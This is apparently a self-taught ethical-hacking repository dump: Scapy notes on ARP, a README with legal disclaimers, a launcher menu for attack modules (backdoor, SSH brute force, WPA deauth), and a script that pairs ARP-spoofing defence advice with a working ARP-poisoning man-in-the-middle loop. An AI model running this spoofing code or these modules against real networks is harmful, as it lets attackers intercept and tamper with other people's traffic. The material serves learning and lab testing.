01-00-5e-00-00-fc static 105 | 239.255.255.250 01-00-5e-7f-ff-fa static 106 | 255.255.255.255 ff-ff-ff-ff-ff-ff static 107 | 108 | -------------------------------------------------------------------------------- /network/anotations/arp/index: -------------------------------------------------------------------------------- 1 | Scapy 2 | 3 | Uso básico 4 | 5 | Aqui vou mostrar de forma teórica a relação de um comando do Scapy com o modelo OSI 6 | 7 | 1 - Note que aqui estamos criando um pacote Ethernet (broadcast), camadas 1 e 2 do modelo OSI 8 | 2 - Depois estamos usando o protocolo de transporte IP, camada 3 do modelo OSI 9 | 3 - Por último estamos criando o tipo de transporte (menos confiável, o UDP), camada 4 10 | 11 | >> 12 | 13 | 14 | 15 | 16 | broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") //ff:ff:ff.. é um endereço broadcast, portanto o mesmo será enviado para todos 17 | arppacket = ARP(pdst="192.168.1.1") 18 | arppacket.show() 19 | 20 | 21 | Portanto, ao utilizar esse comando, você está criando um objeto Ether representando um pacote Ethernet destinado a ser transmitido para todos os dispositivos na rede (broadcast). Essa construção pode ser usada como parte da criação de pacotes personalizados com Scapy para realizar várias operações de rede, como envio de pacotes de descoberta ou execução de testes na rede. 22 | 23 | O valor 0x806 que você está vendo refere-se ao tipo do pacote na camada de enlace (camada 2) do modelo OSI. Especificamente, 0x806 é o valor hexadecimal que representa o protocolo ARP (Address Resolution Protocol). 24 | 25 | O campo pdst (protocol destination) em um pacote ARP (Address Resolution Protocol) é usado para especificar o endereço IP de destino para o qual o dispositivo está procurando o endereço MAC correspondente. Vamos entender melhor como isso funciona: 26 | 27 | 1. Descoberta do Endereço MAC: Quando um dispositivo precisa se comunicar com outro na mesma rede local, ele precisa saber o endereço MAC associado ao endereço IP de destino. Para descobrir isso, ele usa o ARP. 28 | 29 | 2. Campo pdst no ARP: O campo pdst em um pacote ARP é usado para indicar o endereço IP de destino para o qual o dispositivo está procurando o endereço MAC correspondente. O dispositivo emite um pacote ARP de solicitação contendo seu próprio endereço MAC e IP no campo de origem e o endereço IP de destino no campo pdst. 30 | 31 | 3. Broadcast ARP Request: O pacote ARP de solicitação é enviado como um broadcast, ou seja, o endereço de destino no cabeçalho Ethernet é configurado como ff:ff:ff:ff:ff:ff. Isso significa que todos os dispositivos na mesma rede local receberão o pacote. 32 | 33 | 4. Resposta ARP: O dispositivo que possui o endereço IP especificado em pdst responde ao ARP Request, fornecendo seu próprio endereço MAC no campo de origem do ARP Reply. 34 | 35 | 5. Atualização de Tabela ARP: O dispositivo que emitiu a solicitação ARP agora tem o endereço MAC correspondente ao endereço IP de destino e pode usar essas informações para construir os pacotes Ethernet apropriados para se comunicar com o destino. 36 | 37 | Portanto, o campo pdst é essencial para o processo de descoberta de endereços MAC na rede local, permitindo que os dispositivos encontrem uns aos outros e atualizem suas tabelas ARP. 38 | 39 | 40 | Alterar tabela ARP de uma máquina 41 | (Sessão “Change MAC in ARP table”) 42 | 43 | 44 | Neste exemplo temos uma máquina Kali alterando a tabela ARP no PC-1 do PC-2, ou seja, o PC-1 tinha gravado em sua tabela ARP 192.168.100.4 = 0c-91-92-7b-f1-c4, com a alteração a tabela da máquina PC-1 fica 192.168.100.4 =08-00-27-cb-7e-f5 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | scapy: Importa o módulo Scapy, que é uma poderosa biblioteca para manipulação de pacotes de rede. 53 | 54 | ARP: Representa o protocolo ARP. 55 | 56 | op=2: Define o tipo de operação ARP como 2, indicando uma resposta ARP (ARP Reply). O valor 1 é utilizado para solicitações ARP (ARP Request). 57 | 58 | hwdst=mac: Especifica o endereço MAC de destino (Hardware Destination), indicando para qual dispositivo o pacote ARP está destinado. 59 | 60 | pdst=target_ip: Especifica o endereço IP de destino (Protocol Destination), indicando para qual IP o pacote ARP está destinado. 61 | 62 | psrc=spoofed_ip: Especifica o endereço IP de origem (Protocol Source), indicando o endereço IP que está sendo falsificado (spoofed). Este é o IP que será associado ao endereço MAC fornecido. 63 | 64 | Resumidamente, o código está construindo um pacote ARP Reply (op=2) que será enviado para a máquina com o endereço IP target_ip e endereço MAC mac, alegando falsamente que o endereço IP de origem é spoofed_ip. 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | [![Status](https://img.shields.io/badge/status-learning-yellow.svg)]() 3 | [![Focus](https://img.shields.io/badge/focus-ethical--hacking-brightgreen.svg)]() 4 | 5 | 6 | # ⚡️ My Self-Taught Knowledge on Ethical Hacking 7 | *Knowledge that I have been acquiring in a completely self-taught way* 8 | 9 | ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⠴⠶⠶⠶⠶⠶⠶⠶⠶⢤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 10 | ⠀⠀⠀⠀⢀⣤⠶⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠛⠶⣤⡀⠀⠀⠀⠀⠀ 11 | ⠀⠀⢀⡴⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢷⡄⠀⠀⠀ 12 | ⠀⣰⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣦⠀⠀ 13 | ⢰⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣧⠀ 14 | ⣿⠀⠀⣤⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡄⠀⢹⡄ 15 | ⡏⠀⢰⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠀⢸⡇ 16 | ⣿⠀⠘⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡟⠀⢸⡇ 17 | ⢹⡆⠀⢹⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⠃⠀⣾⠀ 18 | ⠈⢷⡀⢸⡇⠀⢀⣠⣤⣶⣶⣶⣤⡀⠀⠀⠀⠀⠀⢀⣠⣶⣶⣶⣶⣤⣄⠀⠀⣿⠀⣼⠃⠀ 19 | ⠀⠈⢷⣼⠃⠀⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⡾⠃⠀⠀ 20 | ⠀⠀⠈⣿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⢹⣿⣿⣿⣿⣿⣿⣿⠃⠀⢸⡇⠀⠀⠀ 21 | ⠀⠀⠀⣿⠀⠀⠘⢿⣿⣿⣿⣿⡿⠃⠀⢠⠀⣄⠀⠀⠙⢿⣿⣿⣿⡿⠏⠀⠀⢘⡇⠀⠀⠀ 22 | ⠀⠀⠀⢻⡄⠀⠀⠀⠈⠉⠉⠀⠀⠀⣴⣿⠀⣿⣷⠀⠀⠀⠀⠉⠁⠀⠀⠀⠀⢸⡇⠀⠀⠀ 23 | ⠀⠀⠀⠈⠻⣄⡀⠀⠀⠀⠀⠀⠀⢠⣿⣿⠀⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠀⠀⠀⠀ 24 | ⠀⠀⠀⠀⠀⠘⣟⠳⣦⡀⠀⠀⠀⠸⣿⡿⠀⢻⣿⡟⠀⠀⠀⠀⣤⡾⢻⡏⠁⠀⠀⠀⠀⠀ 25 | ⠀⠀⠀⠀⠀⠀⢻⡄⢻⠻⣆⠀⠀⠀⠈⠀⠀⠀⠈⠀⠀⠀⢀⡾⢻⠁⢸⠁⠀⠀⠀⠀⠀⠀ 26 | ⠀⠀⠀⠀⠀⠀⢸⡇⠀⡆⢹⠒⡦⢤⠤⡤⢤⢤⡤⣤⠤⡔⡿⢁⡇⠀⡿⠀⠀⠀⠀⠀⠀⠀ 27 | ⠀⠀⠀⠀⠀⠀⠘⡇⠀⢣⢸⠦⣧⣼⣀⡇⢸⢀⣇⣸⣠⡷⢇⢸⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀ 28 | ⠀⠀⠀⠀⠀⠀⠀⣷⠀⠈⠺⣄⣇⢸⠉⡏⢹⠉⡏⢹⢀⣧⠾⠋⠀⢠⡇⠀⠀⠀⠀⠀⠀⠀ 29 | ⠀⠀⠀⠀⠀⠀⠀⠻⣆⠀⠀⠀⠈⠉⠙⠓⠚⠚⠋⠉⠁⠀⠀⠀⢀⡾⠁⠀⠀⠀⠀⠀⠀⠀ 30 | ⠀⠀⠀⠀⠀⠀⠀⠀⠙⢷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡴⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀ 31 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠳⠶⠦⣤⣤⣤⡤⠶⠞⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 32 | 33 | 34 | 35 | 36 | # ⚠️ Use with Moderation 37 | 38 | > **Important:** Some of the scripts and examples in this repository can be harmful if deployed in production or used without explicit authorization. This project is provided **for educational purposes only** and is intended for use by trained, authorized cybersecurity professionals. The maintainers **do not** condone or take responsibility for malicious use. 39 | 40 | --- 41 | 42 | ## 🧠 About 43 | 44 | This repository contains a collection of scripts for penetration testing and cybersecurity experimentation. It is designed for educational and research purposes only. 45 | 46 | --- 47 | 48 | ## 🎯 Intended Audience 49 | 50 | - Cybersecurity professionals 51 | - Red team / Blue team practitioners 52 | - Security researchers and students 53 | - Penetration testers and lab engineers 54 | 55 | --- 56 | 57 | ## 📦 What’s Included 58 | 59 | This repository includes examples such as: 60 | 61 | - Network packet manipulation scripts 62 | - Backdoor demonstrations (educational use only) 63 | - Spoofing tools and traffic emulation 64 | - Network analyzers/sniffers 65 | - Example scripts for Software Defined Radios (SDRs) 66 | - Illustrations based on RFCs 67 | 68 | > ⚠️ These tools are intended to be used **only** in isolated labs, test environments, or with **explicit authorization**. 69 | 70 | --- 71 | 72 | ## ⚖️ Disclaimer & Legal Notice 73 | 74 | By using this repository, you agree to the following: 75 | 76 | - You will **only** use these scripts in environments you **own** or have **written authorization** to test. 77 | - Unauthorized access, interference, or disruption of systems is **illegal** and **unethical**. 78 | - The authors and maintainers are **not responsible** for any misuse or damage resulting from this repository. 79 | - You are responsible for complying with **all applicable laws and regulations**. 80 | 81 | If in doubt, get written permission before proceeding. 82 | 83 | --- 84 | 85 | ## ✅ Responsible Use Guidelines 86 | 87 | 1. Always get **explicit, written authorization** before testing. 88 | 2. Use **isolated environments** (VMs, containers, lab networks). 89 | 3. Avoid causing harm or disruption to production systems. 90 | 4. Document your scope and keep testing controlled. 91 | 5. Report vulnerabilities responsibly and ethically. 92 | 93 | --- 94 | 95 | ## 🤝 Contributing 96 | 97 | Contributions are welcome as long as they follow these principles: 98 | 99 | - Educational and ethical intent 100 | - Clear documentation and usage instructions 101 | - No inclusion of covert or malicious functionality 102 | 103 | Please open issues or pull requests with proper descriptions and disclaimers. 104 | 105 | --- 106 | 107 | ## 📢 Reporting Vulnerabilities 108 | 109 | If you find a vulnerability in this repository, please report it responsibly by: 110 | 111 | - Opening an issue, or 112 | - Contacting the maintainers privately 113 | 114 | Do **not** publicly disclose exploits without allowing time for mitigation. 115 | 116 | --- 117 | 118 | ## 📄 License 119 | 120 | This repository is shared for **educational purposes**. The license does **not** permit illegal use or unauthorized activity. 121 | 122 | --- 123 | 124 | ## 🙏 Final Note 125 | 126 | This project exists to **educate and empower** cybersecurity professionals. Use it **ethically**, **legally**, and with **respect** for others' systems and data. 127 | 128 | 129 | -------------------------------------------------------------------------------- /network/zeroday.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from rich.console import Console 4 | from rich.panel import Panel 5 | from rich.prompt import Prompt 6 | from rich.table import Table 7 | from rich.theme import Theme 8 | from rich import box 9 | from pathlib import Path 10 | import importlib.util 11 | 12 | console = Console(theme=Theme({ 13 | "title": "bold magenta", 14 | "option": "bold cyan", 15 | "desc": "italic dim yellow", 16 | "warn": "bold red" 17 | })) 18 | 19 | ASCII_LOGO = r""" 20 | ░██████╗███████╗██████╗░░█████╗░██████╗░░█████╗░██╗░░░██╗ 21 | ██╔═══██╗██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗╚██╗░██╔╝ 22 | ██║██╗██║█████╗░░██████╔╝███████║██████╔╝███████║░╚████╔╝░ 23 | ╚██████╔╝██╔══╝░░██╔══██╗██╔══██║██╔═══╝░██╔══██║░░╚██╔╝░░ 24 | ░╚═██╔═╝░███████╗██║░░██║██║░░██║██║░░░░░██║░░██║░░░██║░░░ 25 | ░░░╚═╝░░░╚══════╝╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░░░░╚═╝░░╚═╝░░░╚═╝░░░ 26 | (Skull - ZeroDay) 27 | """ 28 | 29 | DESCRIPTION = """ 30 | [desc]Welcome to [b]ZeroDay[/b], a hacking tool for all possible scenarios. 31 | Here you'll find scanners, network attacks like ARP spoofing, wireless attacks, persistence, and much more. 32 | 33 | [desc]Follow me on Instagram: [b cyan]@zero_s_day[/b cyan] 34 | [desc]GitHub: [cyan]https://github.com/LuanMattos/[/cyan] 35 | 36 | [desc]⚠️ [warn]This tool is for serious cybersecurity professionals only. Practicing unethical hacking is a crime![/warn] 37 | """ 38 | 39 | SCRIPTS_PATH = Path(__file__).parent 40 | NETWORK_TOOLS_PATH = SCRIPTS_PATH 41 | 42 | # Mapeie aqui os módulos. O label mostrado, caminho do script e um ícone/símbolo bonito 43 | TOOLS = [ 44 | {"icon": "🌐", "name": "Advanced Scanner", "path": "advancedscanner.py", "desc": "Network host discovery and port scanning"}, 45 | {"icon": "🤖", "name": "Backdoor & Persistence","path": "backdoor-and-persistence/main.py","desc": "Persistence & backdoor modules"}, 46 | {"icon": "🔑", "name": "BruteSH", "path": "brutesh/main.py", "desc": "SSH brute force attack tool"}, 47 | {"icon": "🔒", "name": "CryptForce", "path": "cryptforce/main.py", "desc": "Password/password hash cracking"}, 48 | {"icon": "🔎", "name": "Network Scanners", "path": "scanner/scanner_line_filter.py","desc": "Live packet capture and filtering"}, 49 | {"icon": "📡", "name": "AICrack Wireless Attack", "path": "aicrack.py", "desc": "Automated wireless (WPA deauth) attacks"}, 50 | # Adicione mais conforme for expandindo... 51 | ] 52 | 53 | def print_logo(): 54 | console.print(Panel.fit(ASCII_LOGO, style="title", padding=1, width=75, border_style="magenta")) 55 | 56 | def print_description(): 57 | console.print(DESCRIPTION, highlight=True) 58 | 59 | def main_menu(): 60 | table = Table(title="Available Modules", box=box.DOUBLE_EDGE, title_style="bold magenta") 61 | table.add_column("Option", style="option", justify="center") 62 | table.add_column("Module", style="option") 63 | table.add_column("Description", style="desc") 64 | for idx, tool in enumerate(TOOLS, 1): 65 | table.add_row( 66 | f"[bold blue]{tool['icon']} {idx}[/bold blue]", 67 | f"[bold]{tool['name']}[/bold]", 68 | tool['desc'] 69 | ) 70 | console.print(table) 71 | 72 | def run_tool(index): 73 | tool = TOOLS[index] 74 | tool_path = NETWORK_TOOLS_PATH / tool["path"] 75 | if not tool_path.exists(): 76 | console.print(f"[warn][!] Module not found: {tool_path}[/warn]") 77 | return 78 | 79 | # --- Load modules --- 80 | spec = importlib.util.spec_from_file_location("module", tool_path) 81 | module = importlib.util.module_from_spec(spec) 82 | spec.loader.exec_module(module) 83 | 84 | 85 | # --- Has get_args? --- 86 | if hasattr(module, "get_args"): 87 | args_info = module.get_args() 88 | 89 | # Show nice tables 90 | table = Table(title=f"Arguments for {tool['name']}", box=box.MINIMAL_DOUBLE_HEAD) 91 | table.add_column("Flag", style="cyan", justify="center") 92 | table.add_column("Description", style="yellow") 93 | 94 | for arg in args_info: 95 | table.add_row(arg["flag"], arg["desc"]) 96 | 97 | console.print(table) 98 | else: 99 | args_info = [] 100 | console.print("[desc]This module does not provide argument info.\n") 101 | 102 | # --- Answaer args --- 103 | args = Prompt.ask("[option]Enter arguments (or leave empty)", default="") 104 | 105 | console.print(f"[desc]Launching [b]{tool['name']}[/b]...\n") 106 | 107 | import subprocess 108 | cmd = [sys.executable, str(tool_path)] + args.split() 109 | subprocess.run(cmd) 110 | 111 | def main(): 112 | print_logo() 113 | print_description() 114 | while True: 115 | main_menu() 116 | choice = Prompt.ask("\n[option]Select an option", choices=[str(i+1) for i in range(len(TOOLS))], default="1") 117 | run_tool(int(choice)-1) 118 | again = Prompt.ask("[option]Back to menu? (y/n)", choices=["y", "n"], default="y") 119 | if again == "n": 120 | console.print("[desc]Goodbye!") 121 | break 122 | 123 | if __name__ == "__main__": 124 | main() -------------------------------------------------------------------------------- /network/anotations/arp/arp-spoofing-mim.py: -------------------------------------------------------------------------------- 1 | 2 | # Protections in the equipment (switch/router) 3 | # Many modern routers and switches include mechanisms that detect and mitigate ARP spoofing, for example Dynamic ARP Inspection (DAI) or ARP validation that blocks inconsistent ARP replies; port security that locks a MAC to a port and blocks frames from other MACs; and IP/MAC binding or ARP ACLs that associate known IP↔MAC pairs and drop conflicting announcements. 4 | # Cisco 5 | # +1 6 | 7 | # Static ARP entries or bindings 8 | # If a router or host has static ARP entries (or bindings learned/vetted via DHCP snooping), fake ARP replies will be ignored and the session will stay stable — or, if conflict is detected, traffic may drop. 9 | # Cisco 10 | # +1 11 | 12 | # Switching vs. bridging and client isolation 13 | # In networks where client-to-client traffic is blocked (for example Wi-Fi client isolation) or where switching behavior isolates ports, a host may be prevented from seeing or responding to ARP for another host — so some attacks simply can’t reach their target. Conversely, some switches forward unexpected frames differently, changing outcomes. 14 | # UI Community 15 | # +1 16 | 17 | # Host IP stack behavior 18 | # Operating systems and NIC drivers react differently to conflicting ARP: some update their ARP table, some ignore conflicting replies, some mark a conflict and temporarily disable the interface — so identical spoofing attempts can result in different host-side outcomes. 19 | # ESET Security Forum 20 | 21 | # NAT / Proxy ARP / asymmetric routing 22 | # When NAT, proxy ARP, or asymmetric routes are present, the forwarding path may not match ARP expectations, so forcing inconsistent ARP replies can break connectivity or appear ineffective. 23 | # arubanetworking.hpe.com 24 | 25 | # IDS/IPS / firmware protections 26 | # Some routers and firmwares include intrusion-detection/mitigation logic that recognizes MITM/ARP-poisoning patterns and can block or disconnect offending devices. 27 | # Cisco Meraki Documentation 28 | # +1 29 | 30 | # Timing / TTL and concurrency 31 | # ARP cache entries expire; if an attacker’s spoof packets are not sent at the right cadence or are too aggressive, the network’s ARP behavior can be unstable. (This is an explanation of behavior variance — not instruction to attack.) 32 | # Cisco 33 | 34 | # How to prevent ARP spoofing (practical defensive steps) 35 | 36 | # Enable Dynamic ARP Inspection (DAI) + DHCP Snooping on managed switches 37 | # DAI validates ARP packets against a trusted DHCP binding database and drops invalid ARP packets. On many enterprise switches (Cisco, Juniper, Aruba, Meraki, Netgear smart switches) this is a first-line defense. Make sure DHCP snooping is enabled because DAI usually depends on its binding table. 38 | # Cisco 39 | # +2 40 | # Juniper Networks 41 | # +2 42 | 43 | # Use Port Security / IP Source Guard 44 | # Lock each access port to a known MAC (or a limited set). IP Source Guard prevents IP spoofing by allowing traffic only if the IP↔MAC binding matches the DHCP snooping database. These features limit what a compromised client can impersonate. 45 | # Juniper Networks 46 | # +1 47 | 48 | # Configure static ARP or IP-MAC binding for critical hosts 49 | # For servers, gateways, and other critical devices, populate static ARP entries or use ARP/IP-MAC binding features in the router so forged ARP replies are ignored. Consumer/SMB routers often call this “IP & MAC Binding” or “ARP Binding.” 50 | # TP-Link 51 | # +1 52 | 53 | # Segment the network & enable client isolation where appropriate 54 | # Put sensitive endpoints on separate VLANs, and enable client isolation on guest Wi-Fi to stop client-to-client spoofing. This reduces the attack surface. 55 | # Reddit 56 | 57 | # Use encrypted protocols end-to-end 58 | # Even when ARP spoofing is possible, using TLS (HTTPS), SSH, and IPSec prevents attackers from reading or tampering with payloads. Don’t rely on link-layer security alone. (Best practice — no vendor doc needed.) 59 | 60 | # Monitor ARP activity and alert on anomalies 61 | # Use network monitoring / NMS that detects sudden changes in IP↔MAC mappings (multiple MACs for a single IP or many IPs from one MAC) and alert administrators. Many managed switch platforms export logs you can ingest into SIEM. 62 | # Cisco 63 | 64 | # Keep firmware up to date and enable built-in protections 65 | # Enable router/switch security features and keep firmware current — vendors add mitigations over time. Some consumer routers offer “ARP Spoofing Defense” or “Anti ARP Spoofing.” 66 | # TP-Link 67 | # +1 68 | 69 | # Test only in controlled labs 70 | # For validation, test in an isolated lab (VMs, separate VLAN, or physical test network) that you control. Capture traffic with Wireshark/tcpdump to verify behavior. (Ethics and legality: never test on networks you do not own or have authorization to test.) 71 | 72 | # Examples of vendors / products that implement ARP protections 73 | 74 | # Cisco Catalyst / IOS switches — DAI, DHCP snooping, IP Source Guard, port security. (Enterprise-grade). 75 | # Cisco 76 | # +1 77 | 78 | # Juniper (EX Series, MX) — supports Dynamic ARP Inspection and IP Source Guard. 79 | # Juniper Networks 80 | # +1 81 | 82 | # Aruba / HPE switches — Dynamic ARP protection/DAI on supported platforms (AOS-CX, etc.). 83 | # arubanetworking.hpe.com 84 | # +1 85 | 86 | # Cisco Meraki MS switches — include DAI support in their managed cloud switches. 87 | # Cisco Meraki Documentation 88 | 89 | # Netgear Smart Managed / Pro switches — have ARP/DAI related protections on managed lines. (Check model documentation.) 90 | # kb.netgear.com 91 | # +1 92 | 93 | # TP-Link (selected consumer/SMB models) — “ARP Spoofing Defense” and IP-MAC binding features on some routers and gateways. Good for small deployments but check model capability. 94 | # TP-Link 95 | # +1 96 | 97 | # Note: Ubiquiti consumer switches generally do not provide full DAI; community threads confirm this limitation — for advanced DAI you’ll need higher-end managed switches. Always verify feature support per model and OS/firmware version. 98 | # UI Community 99 | 100 | # Quick checklist to harden a LAN against ARP spoofing 101 | 102 | # Enable DHCP Snooping on access switches. 103 | 104 | # Enable DAI on VLANs where hosts are untrusted. 105 | 106 | # Configure Port Security & IP Source Guard on access ports. 107 | 108 | # Set static ARP/IP-MAC bindings for gateways and critical servers. 109 | 110 | # Segment hosts into VLANs and enable client isolation on guest Wi-Fi. 111 | 112 | # Monitor ARP changes and generate alerts. 113 | 114 | # Keep firmware updated. 115 | 116 | import scapy.all as scapy 117 | 118 | def get_target_mac(ip): 119 | arp_request = scapy.ARP(pdst=ip) 120 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 121 | finalpacket = broadcast/arp_request 122 | answer = scapy.srp(finalpacket, timeout=2, verbose=False)[0] 123 | 124 | mac = answer[0][1].hwsrc 125 | 126 | 127 | return mac 128 | 129 | 130 | def spoof_arp(target_ip, spoofed_ip): 131 | mac = get_target_mac(target_ip) 132 | packet = scapy.ARP(op=2, hwdst=mac, pdst=target_ip, psrc=spoofed_ip) 133 | scapy.send(packet, verbose=False) 134 | 135 | def main(): 136 | try: 137 | while True: 138 | spoof_arp("192.168.100.1", "192.168.100.6") 139 | spoof_arp("192.168.100.6", "192.168.100.1") 140 | 141 | except KeyboardInterrupt: 142 | print('ERROROORORORO') 143 | 144 | main() 145 | 146 | --------------------------------------------------------------------------------